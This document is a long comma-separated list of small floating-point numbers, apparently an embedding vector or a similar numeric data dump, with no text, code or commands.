-0.008847962133586407, 0.0025936237070709467, -0.012012182734906673, -0.0054503148421645164, -0.0002351629373151809, 0.021238073706626892, 0.007310313638299704, -0.009055452421307564, 0.04093479365110397, 0.004398044664412737, 0.032309141010046005, -0.02863360568881035, -0.0029919303487986326, -0.0310345608741045, -0.02987854555249214, -0.015013376250863075, 0.009677921421825886, 0.008996169082820415, -0.0035013919696211815, 0.0006553531275130808, 0.02036365121603012, -0.0017997896065935493, 0.01695488952100277, -0.03334658965468407, 0.0010374494595453143, -0.008922065608203411, 0.0024750581942498684, 0.011552740819752216, -0.03725925832986832, 0.009722383692860603, -0.009626049548387527, -0.019770823419094086, 0.0363403744995594, 0.008588599972426891, -0.0034013523254543543, -0.0073621864430606365, -0.010456008836627007, -0.013953696005046368, 0.01885193958878517, 0.030619580298662186, -0.01591743901371956, 0.02274978533387184, 0.0009012842201627791, 0.019429946318268776, -0.014027799479663372, -0.02002277597784996, 0.0011310052359476686, 0.010826526209712029, -0.0023564924485981464, -0.006995373871177435, -0.005313223693519831, -0.028040777891874313, -0.011397123336791992, 0.028381653130054474, 0.001846104278229177, 0.0126494737342, -0.0016543613746762276, -0.0066063301637768745, -0.007936488837003708, 0.002425038255751133, -0.006043143104761839, 0.010300391353666782, -0.012182621285319328, 0.0172809436917305, -0.04155726358294487, -0.021593770012259483, 0.021816080436110497, 0.03275376185774803, -0.02067488618195057, 0.01551728043705225, -0.018748193979263306, 0.019385484978556633, -0.009433380328118801, -0.001442240085452795, -0.006635971367359161, -0.00880349986255169, 0.00034666559076868, -0.010441187769174576, 0.021504845470190048, 0.004064579028636217, 0.007325134240090847, 0.02732938341796398, 0.0019952377770096064, -0.02086755633354187, -0.006309916265308857, -0.0037292605265975, 0.013368277810513973, 0.0020971300546079874, 0.02863360568881035, -0.0035217704717069864, -0.011671306565403938, 0.011404533870518208, -0.004386929329484701, 0.010574574582278728, -0.011078478768467903, 0.0001095921834348701, -0.02918197214603424, -0.02931535802781582, 0.007669716142117977, -0.03100491873919964, 0.019622616469860077, -0.007728998549282551, 0.005076092202216387, -0.019370663911104202, -0.020230265334248543, -0.028722530230879784, -0.01609528809785843, 0.014598396606743336, 0.030249062925577164, -0.01255313865840435, -0.009818718768656254, 0.003486571367830038, -0.010826526209712029, -0.015265327878296375, 0.04054945334792137, 0.048048730939626694, -0.002830754965543747, 0.018081262707710266, -0.009329634718596935, -0.01596190221607685, 0.025921417400240898, -0.02614372782409191, 0.029789621010422707, 0.018926043063402176, 0.006706370040774345, 0.00044068446732126176, -0.0359550341963768, 0.026203010231256485, 0.023979904130101204, -0.003997885622084141, -0.008358879014849663, -0.006006091367453337, 0.023446358740329742, -0.007521508727222681, 0.010285570286214352, -0.010619036853313446, 0.001004102872684598, -0.022305164486169815, -0.0011365630198270082, 0.03660714626312256, 0.01137489266693592, 0.030915994197130203, 0.00824031326919794, -0.01612492837011814, -0.025491615757346153, 0.011293378658592701, -0.008855372667312622, 0.0186740905046463, 0.022290343418717384, -0.004268363583832979, 0.00890724454075098, 0.04730769619345665, -0.0013885149965062737, -0.035895753651857376, -0.010826526209712029, -0.018555525690317154, -0.0027307153213769197, 0.011174812912940979, 0.0029548783786594868, -0.012064055539667606, 0.0055985222570598125, 0.016732579097151756, -0.021786440163850784, -0.008544137701392174, 0.01170835830271244, -0.025135919451713562, -0.01035967469215393, 0.02559536136686802, -0.0027140420861542225, -0.004942705854773521, 0.03948236256837845, -0.01848142221570015, 0.006035733036696911, 0.0021286241244524717, -0.03447296470403671, 0.02644014172255993, 0.01144158560782671, 0.03625144809484482, -0.016999350860714912, -0.009010990150272846, -0.00027858297107741237, -0.004583303816616535, 0.00500569399446249, -0.015561742708086967, -0.00880349986255169, 0.013464611954987049, -0.0068434616550803185, -0.020437754690647125, -0.000030509814678225666, -0.02933017909526825, -0.005913462024182081, -0.02071934938430786, -0.008166209794580936, 0.007640074472874403, -0.017384689301252365, -0.0072843777015805244, -0.044343557208776474, -0.009989156387746334, 0.02663281001150608, 0.005446610040962696, 0.024632014334201813, -0.009203659370541573, 0.02509145624935627, -0.02220141887664795, -0.022319985553622246, 0.04084586724638939, -0.013649871572852135, 0.01833321526646614, 0.010982143692672253, 0.004353582859039307, 0.01407226175069809, 0.005290992558002472, 0.0383559912443161, -0.01711791753768921, -0.0056578051298856735, 0.008455213159322739, -0.019622616469860077, 0.017873773351311684, 0.010048439726233482, 0.01228636596351862, -0.008292186073958874, -0.016539908945560455, 0.0064210714772343636, -0.007358481176197529, -0.00496493699029088, -0.012708756141364574, 0.0023694606497883797, -0.02728492207825184, -0.03388013690710068, -0.0035032446030527353, -0.018036801367998123, -0.00026515169884078205, 0.0000660563528072089, 0.0234018974006176, -0.0029382051434367895, 0.029893366619944572, -0.013331226073205471, 0.024305960163474083, -0.011893616989254951, 0.0053428648971021175, -0.0024528270587325096, 0.011308199726045132, 0.012212262488901615, -0.0037607543636113405, 0.006135772913694382, 0.026721734553575516, 0.01137489266693592, -0.012916246429085732, 0.00991505291312933, 0.012064055539667606, -0.017770027741789818, 0.04837478697299957, -0.017933055758476257, -0.015591383911669254, 0.013961105607450008, 0.004249837715178728, 0.02541751228272915, -0.01042636763304472, 0.018051620572805405, -0.010685729794204235, -0.00907027255743742, 0.018703732639551163, 0.000018120630556950346, -0.0040201167576014996, -0.018407318741083145, -0.0031808943022042513, -0.006684138905256987, 0.020615603774785995, 0.02088237553834915, -0.00010577122156973928, -0.014398316852748394, -0.013123735785484314, -0.009211069904267788, -0.000040380637074122205, -0.014798476360738277, 0.021104685962200165, -0.0059616295620799065, 0.004909359384328127, -0.0034161729272454977, -0.027581335976719856, 0.03370228782296181, -0.011826924048364162, -0.017577359452843666, 0.044699251651763916, -0.012508676387369633, -0.0001296811824431643, 0.00916660763323307, 0.017710745334625244, 0.025862133130431175, -0.010107722133398056, 0.00840334128588438, -0.02070452831685543, -0.03278340399265289, 0.0065396372228860855, 0.006372903939336538, -0.013509074226021767, 0.015280148945748806, 0.0032235037069767714, -0.01676221936941147, -0.05003470554947853, 0.021593770012259483, -0.0004548104479908943, -0.008040233515202999, -0.010967323556542397, 0.005994976032525301, -0.0021749387960880995, 0.013872181996703148, -0.0014116723323240876, -0.019237278029322624, -0.01897050440311432, 0.006228402256965637, -0.006687844172120094, 0.0014190827496349812, -0.010796885006129742, -0.01815536618232727, -0.026010340079665184, 0.011841745115816593, 0.028885558247566223, 0.016851143911480904, -0.0022008749656379223, 0.0077438196167349815, 0.013012580573558807, -0.0029400577768683434, -0.02104540355503559, -0.0008864635601639748, -0.009344455786049366, -0.035895753651857376, 0.015339432284235954, -0.012167800217866898, 0.006091310642659664, 0.030234241858124733, 0.01750325597822666, 0.014057440683245659, -0.011649075895547867, 0.000853580073453486, -0.04686307534575462, -0.011849155649542809, -0.010167005471885204, -0.024898787960410118, 0.03305017575621605, 0.017592178657650948, 0.0013653576606884599, 0.0036607147194445133, -0.0023527871817350388, 0.026010340079665184, -0.03945272043347359, -0.017710745334625244, 0.0009086945792660117, 0.00832182727754116, -0.0052168890833854675, 0.0022842413745820522, -0.0038200372364372015, -0.01676221936941147, 0.005127964541316032, 0.02543233335018158, -0.018763015046715736, -0.029967470094561577, -0.002384281251579523, 0.0062728640623390675, 0.007139875553548336, -0.012856963090598583, 0.015280148945748806, 0.04410642385482788, -0.006417366210371256, -0.01934102363884449, 0.056555818766355515, 0.010033618658781052, -0.007162106689065695, -0.0008910950273275375, 0.007391827646642923, -0.033139102160930634, -0.003875614842399955, -0.02000795491039753, 0.009959515184164047, -0.007832743227481842, -0.005746729206293821, 0.00797354057431221, -0.0006238591158762574, 0.03509543463587761, 0.01831839419901371, 0.005098323337733746, -0.007251030765473843, 0.0066063301637768745, 0.02558054029941559, -0.018599987030029297, 0.008536727167665958, 0.02134181745350361, 0.01931138150393963, -0.009714973159134388, 0.01551728043705225, -0.007080592680722475, -0.0031808943022042513, 0.0014552081702277064, -0.022156957536935806, 0.019889388233423233, 0.00043443197500891984, 0.014250109903514385, -0.014516882598400116, 0.013390508480370045, -0.01648062653839588, -0.021000942215323448, -0.0005340086063370109, -0.005424378905445337, 0.008514496497809887, -0.013057042844593525, -0.00461665028706193, 0.003766312263906002, 0.01433903444558382, -0.019252099096775055, -0.035362206399440765, -0.008507085964083672, -0.026514245197176933, 0.026662452146410942, -0.013464611954987049, 0.0006910154479555786, -0.008462623693048954, -0.0019952377770096064, 0.0015089332591742277, 0.009818718768656254, 0.021504845470190048, 0.007995771244168282, -0.006795294117182493, -0.014539113268256187, -0.009048041887581348, -0.019222456961870193, 0.02017098292708397, 0.016880786046385765, -0.008284775540232658, -0.0067137801088392735, 0.007862385362386703, -0.01900014653801918, -0.015057838521897793, 0.004238722380250692, -0.0051390803419053555, 0.008773858658969402, -0.008329237811267376, 0.014035210013389587, 0.0019174290355294943, -0.0024565320927649736, 0.01042636763304472, -0.00005731445344281383, -0.005142785143107176, 0.009270352311432362, 0.009737204760313034, -0.01934102363884449, -0.0014181564329192042, 0.02458755299448967, -0.009448200464248657, 0.007506688125431538, 0.0074103535152971745, 0.005924577824771404, 0.012293776497244835, 0.007299198303371668, 0.01061162631958723, -0.003247587475925684, -0.02052667923271656, 0.023653848096728325, -0.0039052562788128853, 0.012679114937782288, -0.0026195598766207695, -0.040638379752635956, -0.005387327168136835, -0.02646978199481964, -0.0290189441293478, 0.010937681421637535, 0.011389713734388351, -0.008625651709735394, 0.005416968371719122, -0.0002813618630170822, 0.003916371613740921, -0.009477842599153519, 0.013012580573558807, 0.0026195598766207695, 0.02952284924685955, 0.004064579028636217, 0.012064055539667606, 0.002060078317299485, 0.011426765471696854, -0.014301982708275318, 0.012790270149707794, 0.016539908945560455, 0.01170835830271244, 0.012960708700120449, 0.010041029192507267, 0.026039982214570045, -0.010885809548199177, 0.01748843491077423, -0.009299993515014648, -0.00023967862944118679, -0.0011689832899719477, 0.027344204485416412, 0.006372903939336538, -0.017577359452843666, 0.005535534117370844, 0.018422139808535576, -0.00805505458265543, -0.0009707562858238816, 0.0037385234609246254, -0.006232107523828745, 0.0029919303487986326, -0.01796269789338112, -0.00017634325195103884, -0.002045257482677698, 0.008277365006506443, -0.02983408421278, 0.004809319507330656, 0.008892424404621124, -0.008262543939054012, 0.0023583450820297003, -0.01594708114862442, -0.005576291121542454, 0.01170835830271244, 0.0037348181940615177, 0.0012773596681654453, 0.009299993515014648, 0.0008174546528607607, 0.01778484880924225, -0.00457589328289032, -0.007699357345700264, -0.005072386935353279, 0.012330828234553337, -0.010619036853313446, 0.019400306046009064, -0.01137489266693592, -0.007469636388123035, -0.026217831298708916, 0.0053910319693386555, 0.0018118314910680056, -0.0029196792747825384, 0.026247471570968628, -0.00009841875726124272, -0.015665486454963684, 0.005428084172308445, -0.027685081586241722, -0.013924053870141506, -0.009907642379403114, 0.00857377890497446, 0.00440916046500206, -0.014168595895171165, -0.014531703665852547, 0.0034847187343984842, -0.0004909359267912805, -0.0021304767578840256, -0.007384417112916708, -0.013716564513742924, 0.019207635894417763, -0.018555525690317154, 0.0003624125965870917, 0.01322748139500618, 0.010493060573935509, 0.014872579835355282, 0.008514496497809887, -0.0009040631121024489, 0.010544933378696442, 0.0020730465184897184, -0.02015616185963154, -0.004772267770022154, 0.023979904130101204, -0.004034937359392643, 0.007617843337357044, -0.01306445337831974, 0.002571392571553588, -0.0071065290831029415, -0.01160461362451315, 0.022290343418717384, 0.0008424645639024675, 0.02455791085958481, 0.010292980819940567, -0.024691298604011536, 0.00031818205025047064, -0.01417600642889738, -0.015428355894982815, 0.015561742708086967, -0.030145317316055298, -0.01917799562215805, -0.01007808092981577, 0.0031771890353411436, 0.01901496760547161, -0.009122145362198353, -0.008129158057272434, -0.02169751562178135, -0.020926838740706444, -0.015606204979121685, -0.0014385349350050092, -0.008684934116899967, 0.017221661284565926, -0.002345376880839467, 0.02272014319896698, -0.005190952681005001, 0.0016404669731855392, -0.008047644048929214, 0.002749241190031171, 0.035895753651857376, -0.003108643228188157, -0.009381507523357868, -0.018585165962576866, 0.008647882379591465, 0.00043327410821802914, -0.001827578409574926, 0.0006873102975077927, -0.012664293870329857, -0.007943899370729923, 0.010174415074288845, -0.00686569232493639, -0.005161311011761427, -0.03642929717898369, 0.007562265731394291, 0.014383495785295963, -0.015124531462788582, 0.022082854062318802, 0.009381507523357868, -0.0016274988884106278, -0.012397521175444126, -0.003445814363658428, 0.003957128617912531, 0.01628795638680458, 0.019770823419094086, 0.014035210013389587, 0.018199827522039413, 0.017710745334625244, -0.017014171928167343, 0.015139352530241013, 0.011182223446667194, -0.0023879865184426308, 0.002300914842635393, -0.00027117261197417974, -0.02187536284327507, -0.019385484978556633, 0.023120302706956863, 0.011367482133209705, -0.023490820080041885, 0.0027547988574951887, -0.00042308488627895713, 0.005750434473156929, -0.0010365232592448592, 0.005068681668490171, -0.012871784158051014, 0.026736555621027946, 0.012760628946125507, 0.021564127877354622, 0.005476251244544983, -0.016391701996326447, -0.021312177181243896, -0.007425174117088318, 0.009211069904267788, 0.014598396606743336, 0.01932620257139206, 0.026484603062272072, 0.005698561668395996, 0.014146365225315094, 0.004979757592082024, -0.009463021531701088, 0.0075474451296031475, 0.007869795896112919, 0.00686569232493639, 0.01732540689408779, -0.017518075183033943, 0.01862962916493416, -0.0072917877696454525, -0.019770823419094086, -0.018244290724396706, -0.024009546265006065, -0.013383098877966404, -0.00042910577030852437, -0.014057440683245659, 0.015131941996514797, 0.013360867276787758, 0.009729794226586819, -0.006228402256965637, -0.0126494737342, -0.001062459428794682, -0.016332419589161873, -0.0031771890353411436, -0.007532624527812004, -0.002082309452816844, -0.01018182560801506, 0.013434970751404762, -0.008432982489466667, 0.008255133405327797, -0.012093696743249893, 0.005554059986025095, -0.04870084300637245, -0.004486969206482172, 0.012027003802359104, -0.02034883014857769, 0.001285696285776794, -0.004260953515768051, -0.010433778166770935, 0.013857360929250717, 0.01382771972566843, -0.01609528809785843, 0.02626229263842106, -0.009411148726940155, 0.006928680464625359, -0.021741976961493492, -0.00758449686691165, 0.02154930867254734, -0.012908835895359516, 0.0066544977016747, 0.0006697106873616576, -0.011463817209005356, 0.018021980300545692, 0.008084695786237717, -0.031093843281269073, 0.03296125307679176, -0.02359456568956375, -0.015739591792225838, 0.020600782707333565, -0.0043165311217308044, -0.032990895211696625, 0.002502846997231245, 0.017058633267879486, -0.015828514471650124, -0.010989554226398468, -0.03204236924648285, -0.0007174148340709507, 0.021119507029652596, -0.001221782062202692, 0.010619036853313446, 0.008232902735471725, -0.000022824468032922596, 0.007262146566063166, 0.0025825081393122673, 0.005457725375890732, -0.018081262707710266, 0.00795871950685978, 0.04327646642923355, 0.03334658965468407, -0.00457589328289032, 0.007062066812068224, 0.00797354057431221, -0.01101178489625454, -0.009307404048740864, 0.019237278029322624, -0.02630675584077835, 0.023609386757016182, -0.016213852912187576, 0.007854974828660488, -0.031123485416173935, 0.008625651709735394, 0.009359276853501797, -0.007273261900991201, -0.0008160651777870953, -0.009907642379403114, -0.003927487414330244, 0.0016664032591506839, 0.0012097401777282357, 0.019948672503232956, 0.023001737892627716, 0.022986916825175285, 0.016243495047092438, 0.002904858672991395, 0.003290196880698204, -0.015591383911669254, -0.016317598521709442, -0.018051620572805405, -0.007176927290856838, 0.00597645016387105, 0.019296560436487198, -0.003147547598928213, -0.001704381313174963, -0.003983065020292997, 0.0002426890714559704, -0.013657281175255775, 0.003849678672850132, -0.010989554226398468, 0.007314018905162811, 0.010930271819233894, 0.004816729575395584, 0.010441187769174576, 0.01968189887702465, 0.009840949438512325, 0.01153792068362236, 0.0027121894527226686, 0.00975202489644289, -0.025862133130431175, 0.011448996141552925, 0.0063321469351649284, -0.007840153761208057, -0.0033587426878511906, -0.007817923091351986, 0.0008822951931506395, -0.012160390615463257, 0.0005969966296106577, -0.016880786046385765, -0.019741181284189224, 0.004509200341999531, -0.022319985553622246, 0.00046361025306396186, 0.003894140711054206, 0.024350421503186226, 0.009588997811079025, 0.012701345607638359, 0.024632014334201813, -0.0005793970194645226, 0.002430595923215151, -0.00332910125143826, 0.011826924048364162, -0.01579887419939041, 0.010204057209193707, 0.008395930752158165, 0.006176529452204704, -0.012612421996891499, 0.011560151353478432, 0.03746674582362175, -0.01094509195536375, -0.0008202334865927696, -0.00915178656578064, -0.006376609206199646, -0.009789076633751392, -0.01313114631921053, 0.0003281397221144289, 0.003323543583974242, 0.0007072256412357092, 0.0012616126332432032, 0.005517008248716593, 0.003525475738570094, 0.02815934270620346, 0.00012806017184630036, -0.013160787522792816, -0.016228673979640007, 0.0015561742475256324, -0.007199158426374197, -0.022809067741036415, -0.016376880928874016, 0.01901496760547161, -0.00030567709472961724, 0.0005113143706694245, 0.01966707780957222, 0.005290992558002472, 0.0017581064021214843, -0.011975130997598171, 0.0010355969425290823, -0.007995771244168282, -0.004868602380156517, 0.0010652383789420128, -0.0009744614944793284, -0.0046981642954051495, 0.005639279261231422, -0.002604739274829626, 0.021075045689940453, 0.012323417700827122, 0.019756002351641655, -0.014287161640822887, -0.006980552803725004, -0.004905654117465019, 0.01760699972510338, 0.0009198101470246911, 0.024142932146787643, -0.008314416743814945, 0.0041868495754897594, 0.008373699150979519, 0.013249712064862251, -0.024809863418340683, -0.011263737455010414, -0.004338761791586876, 0.009588997811079025, -0.009077683091163635, 0.008833141066133976, 0.024646835401654243, 0.006154298782348633, 0.0057837809436023235, -0.017206840217113495, -0.021993929520249367, -0.03728890046477318, -0.0016117518534883857, 0.03373192995786667, 0.006191350519657135, -0.0010263340082019567, 0.004920474719256163, -0.0037440811283886433, 0.004779677838087082, 0.01648062653839588, 0.006361788604408503, -0.002143444726243615, -0.023846518248319626, 0.0024565320927649736, -0.0029122689738869667, -0.02544715441763401, 0.03272411972284317, 0.04381000995635986, -0.0009976188885048032, -0.004116451367735863, -0.0020582256838679314, 0.019563334062695503, 0.01593226008117199, -0.007332544773817062, -0.020630424842238426, 0.010619036853313446, 0.013027401641011238, -0.006472943816334009, 0.003934897948056459, -0.014879989437758923, 0.006936090998351574, -0.006380314473062754, 0.023446358740329742, -0.001105068949982524, -0.000059572295867837965, 0.007817923091351986, -0.0007475194288417697, 0.01831839419901371, 0.00830700621008873, -0.013975926674902439, -0.005457725375890732, -0.00533915963023901, 0.001904460834339261, 0.006558163091540337, 0.02237926796078682, 0.020067237317562103, -0.0007762345485389233, 0.015724770724773407, 0.005165016278624535, 0.03444332256913185, 0.007869795896112919, -0.0020711938850581646, -0.03361336514353752, -0.010581985116004944, 0.006013501901179552, 0.012479035183787346, 0.022675681859254837, -0.018051620572805405, -0.0009985450888052583, -0.0034587825648486614, -0.016584372147917747, -0.021238073706626892, -0.0019285444868728518, -0.0008248649537563324, -0.002910416340455413, -0.0025361934676766396, -0.01457616500556469, -0.013101505115628242, -0.015057838521897793, -0.0011069215834140778, 0.00924812164157629, 0.011159992776811123, -0.0014570608036592603, 0.017236482352018356, -0.003508802503347397, -0.006824935786426067, -0.00653222668915987, -0.03165702894330025, -0.007714177947491407, -0.021149149164557457, 0.010826526209712029, 0.016006363555788994, -0.03465081378817558, -0.019074250012636185, -0.03133097290992737, 0.0011282262858003378, 0.01109329890459776, 0.00328649184666574, -0.015724770724773407, -0.011248916387557983, -0.020126519724726677, -0.005465135909616947, 0.004038642626255751, 0.005398442503064871, -0.01796269789338112, 0.018244290724396706, -0.00908509362488985, 0.003147547598928213, 0.011197044514119625, -0.008936886675655842, -0.013027401641011238, 0.006628561299294233, 0.0053910319693386555, -0.0064210714772343636, 0.014094492420554161, -0.004479558672755957, -0.009907642379403114, -0.008047644048929214, -0.011145171709358692, 0.006602624896913767, -0.0007364038610830903, 0.01247162465006113, -0.009396328590810299, -0.01648062653839588, -0.008929476141929626, 0.01830357313156128, 0.018614808097481728, 0.01339791901409626, -0.003894140711054206, 0.007050951477140188, 0.008996169082820415, 0.012812500819563866, -0.007076887413859367, 0.007002783939242363, -0.013183019123971462, 0.0061654141172766685, 0.0009790929034352303, 0.010189236141741276, -0.015094890259206295, -0.0004450843553058803, 0.027937032282352448, -0.011574972420930862, 0.01084134727716446, 0.00556147051975131, 0.01645098440349102, -0.012701345607638359, 0.0016682558925822377, 0.00069333118153736, 0.0204970370978117, -0.014316802844405174, 0.0071287602186203, -0.0000524224633409176, -0.008558958768844604, 0.0028529861010611057, 0.006798999384045601, 0.0032346192747354507, -0.011448996141552925, -0.02934500016272068, -0.011248916387557983, -0.0014116723323240876, -0.020245086401700974, 0.018940864130854607, 0.0003154031583108008, 0.023194406181573868, 0.0072843777015805244, -0.003084559692069888, 0.015413535758852959, 0.01965225674211979, 0.00806246418505907, 0.0027307153213769197, 0.012360469438135624, 0.013442381285130978, 0.0017757059540599585, -0.002404659753665328, -0.004768562503159046, -0.015235686674714088, 0.006321031600236893, -0.002386133885011077, -0.010908040218055248, -0.00010032924183178693, 0.011137761175632477, -0.007280672434717417, -0.011078478768467903, -0.004253542982041836, -0.008114336989820004, -0.0006067227222956717, -0.01502078678458929, -0.02783328853547573, -0.0037440811283886433, 0.00857377890497446, 0.015828514471650124, -0.004101630765944719, 0.018362855538725853, -0.0022564525716006756, -0.018926043063402176, -0.010982143692672253, 0.00256583490408957, 0.025565719231963158, 0.0035532645415514708, -0.011471226811408997, 0.004868602380156517, -0.01161943469196558, 0.030975278466939926, 0.007251030765473843, 0.017162378877401352, -0.02088237553834915, 0.006235812325030565, 0.01643616333603859, -0.0021730861626565456, 0.007125054951757193, -0.0020396998152136803, 0.017014171928167343, 0.009122145362198353, -0.004805614240467548, -0.008269954472780228, 0.01862962916493416, 0.016510266810655594, 0.015265327878296375, 0.001704381313174963, -0.004349877592176199, 0.00908509362488985, 0.012701345607638359, 0.013279353268444538, -0.012894014827907085, 0.0009865033207461238, -0.003229061607271433, -0.014042619615793228, -0.015472818166017532, -0.014376086182892323, 0.0009170312550850213, 0.011834334582090378, 0.005650394596159458, -0.018036801367998123, -0.016406523063778877, -0.007150991354137659, 0.011063657701015472, 0.020467396825551987, 0.00010351337550673634, 0.02710707299411297, 0.020096879452466965, 0.02663281001150608, -0.007132465485483408, -0.008529316633939743, 0.015487639233469963, 0.0058319480158388615, 0.012819911353290081, -0.0002531099016778171, 0.0037737225648015738, -0.01648062653839588, -0.0015978574519976974, -0.005828243214637041, 0.004913064185529947, -0.004983462858945131, 0.00529469782486558, -0.011812103912234306, 0.03183487802743912, 0.0017738533206284046, 0.014961503446102142, -0.014457600191235542, -0.02137145958840847, -0.008855372667312622, 0.009099913761019707, -0.02866324782371521, -0.01077465433627367, -0.0204970370978117, 0.0005344717646948993, 0.027522053569555283, 0.012027003802359104, 0.0029530259780585766, -0.0032105357386171818, -0.01799233816564083, -0.015976721420884132, 0.013086684048175812, -0.00126253894995898, -0.0213862806558609, 0.006591509561985731, 0.0029252371750772, -0.012953298166394234, 0.005872705020010471, -0.0029956353828310966, -0.024809863418340683, -0.010055849328637123, -0.002048962749540806, -0.03251663222908974, 0.007728998549282551, 0.007221389561891556, -0.007617843337357044, 0.0089887585490942, -0.005820832680910826, -0.01236787997186184, 0.013961105607450008, 0.004298005253076553, 0.0019989428110420704, 0.0010837642475962639, -0.002791850594803691, 0.005635573994368315, 0.017355047166347504, -0.004331351723521948, -0.018348034471273422, -0.009840949438512325, 0.007136170286685228, -0.012923656962811947, -0.000016325935575878248, -0.007132465485483408, 0.009878001175820827, -0.019711541011929512, 0.031242050230503082, 0.0025769504718482494, 0.030945636332035065, 0.006372903939336538, -0.014124133624136448, -0.01075983326882124, -0.005442904774099588, 0.002367608016356826, 0.0009341677068732679, 0.0061654141172766685, -0.023624207824468613, 0.00018363782146479934, -0.015858156606554985, 0.009374096989631653, -0.014968913979828358, 0.014709551818668842, 0.018259111791849136, -0.021238073706626892, -0.00900357961654663, -0.01051529124379158, 0.024498628452420235, 0.00062061712378636, -0.02343153767287731, -0.018362855538725853, -0.0017405067337676883, 0.0251062773168087, 0.016184212639927864, -0.0059616295620799065, 0.002263863105326891, -0.011901027522981167, -0.001363505027256906, -0.018051620572805405, 0.008247723802924156, -0.005031629931181669, -0.009714973159134388, 0.02120843157172203, -0.002186054363846779, 0.004668522626161575, 0.0039052562788128853, 0.004446212202310562, 0.004894538316875696, -0.017355047166347504, 0.00983353890478611, 0.013464611954987049, 0.0019767119083553553, 0.01170835830271244, -0.010448598302900791, -0.018777836114168167, -0.018955685198307037, -0.003827447537332773, -0.021104685962200165, 0.0035180654376745224, 0.000038238580600591376, -0.0068508717231452465, 0.008158799260854721, 0.004675933159887791, 0.019978312775492668, 0.019756002351641655, -0.011782461777329445, 0.027729542925953865, -0.0005553133669309318, 0.008929476141929626, -0.0014524293364956975, 0.030767787247896194, 0.01744397170841694, 0.009618639014661312, 0.0025102572981268167, 0.0018081262242048979, 0.00872198585420847, 0.004724100232124329, -0.008677523583173752, -0.009692742489278316, 0.005083502735942602, -0.019904209300875664, 0.004916769452393055, 0.03521399945020676, -0.00018352203187532723, -0.001084690447896719, -0.006472943816334009, -0.010144773870706558, -0.022764606401324272, -0.004405455198138952, 0.021845722571015358, 0.009055452421307564, -0.0068434616550803185, -0.015013376250863075, 0.005820832680910826, -0.003931192681193352, 0.021238073706626892, -0.008596010506153107, -0.012293776497244835, -0.010893220081925392, 0.009944694116711617, -0.0014978176914155483, -0.0001406809315085411, 0.004553662147372961, -0.006839756388217211, 0.007469636388123035, 0.008729396387934685, 0.006120951846241951, 0.0030938226263970137, 0.0007595612551085651, 0.008277365006506443, 0.006876808125525713, 0.0005738392355851829, 0.0000457647220173385, -0.015206045471131802, -0.005124259274452925, 0.015457997098565102, 0.0067248959094285965, 0.0027177471201866865, 0.010152184404432774, -0.0019507756223902106, 0.007251030765473843, 0.003549559274688363, -0.01800715923309326, 0.015294970013201237, 0.011159992776811123, 0.02593623660504818, 0.002449121791869402, -0.0008591378573328257, -0.012493856251239777, 0.013686923310160637, -0.012278955429792404, -0.007899437099695206, 0.0015709949657320976, -0.007780871354043484, 0.026425320655107498, 0.007180632557719946, -0.011397123336791992, -0.029078226536512375, 0.011982541531324387, -0.0007456668536178768, 0.0016691820928826928, 0.016895605251193047, -0.016065645962953568, 0.0026603168807923794, 0.0075956122018396854, 0.031064201146364212, 0.01984492689371109, -0.0017256861319765449, -0.013849950395524502, 0.0002415312046650797, -0.006313621066510677, 0.005857884418219328, 0.021919826045632362, -0.005939398426562548, 0.008373699150979519, -0.013901823200285435, 0.010167005471885204, -0.019074250012636185, 0.0015737737994641066, 0.018570346757769585, -0.02729974314570427, -0.017666282132267952, -0.022305164486169815, 0.0017182757146656513, 0.012004773132503033, 0.004709279630333185, 0.028455758467316628, -0.004609239753335714, 0.004609239753335714, -0.0013523895759135485, -0.011204454116523266, 0.0038978459779173136, 0.013864771462976933, -0.002643643645569682, -0.0043832240626215935, -0.023327792063355446, -0.005602227058261633, 0.007058361545205116, -0.01984492689371109, 0.001182877691462636, -0.00015202803479041904, 0.023342613130807877, 0.0005798601778224111, 0.007436289917677641, -0.014665089547634125, 0.003445814363658428, -0.00940373819321394, -0.029433924704790115, -0.0018970505334436893, -0.02237926796078682, 0.02117879129946232, -0.0004726416082121432, 0.008581189438700676, 0.0008637693244963884, -0.00356438010931015, 0.016362059861421585, 0.00797354057431221, -0.0011754672741517425, 0.004720395430922508, -0.019622616469860077, 0.017710745334625244, 0.02507663704454899, -0.002206432865932584, 0.017903413623571396, 0.009114734828472137, -0.030130498111248016, 0.006936090998351574, -0.021964287385344505, -0.008944296278059483, -0.004435096401721239, -0.007465931121259928, -0.014716962352395058, 0.006187645252794027, -0.02374277263879776, 0.0025343408342450857, 0.003868204541504383, -0.01576923206448555, 0.01968189887702465, 0.00038209636113606393, -0.012086286209523678, -0.010752422735095024, 0.005416968371719122, -0.008366289548575878, 0.01713273674249649, -0.012041824869811535, -0.04336538910865784, -0.0032105357386171818, 0.011945489794015884, 0.004809319507330656, 0.018955685198307037, -0.007050951477140188, 0.01001138798892498, -0.00416091363877058, 0.0037292605265975, -0.00029039321816526353, -0.013138556852936745, -0.030945636332035065, 0.011715768836438656, 0.006387724541127682, 0.00889983493834734, 0.002908563707023859, -0.00044045288814231753, 0.017681103199720383, 0.0011902879923582077, -0.004864897113293409, -0.009811308234930038, -0.0041979653760790825, -0.019533691927790642, 0.009344455786049366, 0.011671306565403938, -0.01748843491077423, 0.010537522844970226, -0.007280672434717417, -0.02491360902786255, 0.009603817947208881, 0.008870192803442478, 0.023861339315772057, -0.004516610410064459, 0.009944694116711617, -0.021578948944807053, -0.02561018243432045, 0.007491867523640394, 0.0035810533445328474, -0.007491867523640394, 0.003149400232359767, 0.000610891031101346, 0.021089866757392883, -0.00933704525232315, -0.0005835653282701969, 0.00933704525232315, 0.0008943370194174349, 0.012427163310348988, 0.005680035799741745, -0.015235686674714088, 0.019044607877731323, -0.013783257454633713, 0.008032822981476784, -0.0005636500427499413, -0.019444767385721207, -0.015709949657320976, 0.002686253050342202, -0.011337840929627419, -0.01648062653839588, -0.0034606351982802153, -0.014516882598400116, 0.010159594938158989, 0.006487764418125153, 0.004109040834009647, 0.007199158426374197, -0.00830700621008873, 0.015546921640634537, 0.005920872557908297, 0.02051185816526413, 0.01916317455470562, -0.007017605006694794, -0.0008887792937457561, 0.002469500293955207, 0.018926043063402176, 0.013672102242708206, 0.015828514471650124, 0.013353456743061543, -0.011545331217348576, 0.0135609470307827, 0.018348034471273422, 0.007054656744003296, 0.025358229875564575, -0.013783257454633713, -0.0103448536247015, 0.003525475738570094, -0.010092901065945625, 0.010196646675467491, 0.012093696743249893, 0.022156957536935806, -0.0015154172433540225, 0.02478022314608097, 0.013257122598588467, -0.0036792405880987644, 0.001963743707165122, 0.018777836114168167, 0.009892822243273258, 